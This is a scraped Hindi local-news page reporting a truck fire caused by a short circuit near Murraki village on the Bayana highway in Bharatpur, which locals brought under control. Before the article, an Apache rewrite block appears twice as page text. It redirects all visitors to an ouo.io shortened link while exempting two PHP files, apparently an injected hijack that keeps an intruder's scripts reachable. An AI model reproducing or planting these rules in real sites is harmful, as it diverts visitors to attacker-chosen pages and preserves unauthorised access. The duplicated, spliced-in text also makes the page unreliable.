
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 532
Previous Nextबयाना। भरतपुर के बयाना मेगा हाईवे पर स्थित मुर्रकी गांव के पास औद्योगिक क्षेत्र में अचानक एक खड़े टाटा 407 ट्रक में आग लग गई। आग लगने से मौके पर अफरा-तफरी मच गई और ट्रक में बैठे चालक ने कूदकर बड़ी मुश्किल से अपनी जान बचाई। आग लगते देख मौके पर लोगों की भीड़ जमा हो गई और औद्योगिक क्षेत्र में लगे जेट पंपों को चलाकर घंटों की मशक्कत के बाद लोगों ने आग पर काबू पाया। पता चला कि ट्रक चालक ट्रक के केबिन में बैठ कर वायरिंग को ठीक कर रहा था कि अचानक शॉर्ट सर्किट हुआ और ट्रक ने आग पकड़ ली। पुलिस भी मौके पर पहुंच गई और हालात की जानकारी ली। इस घटना में ट्रक पूरी तरह से जलकर ख़ाक हो गया।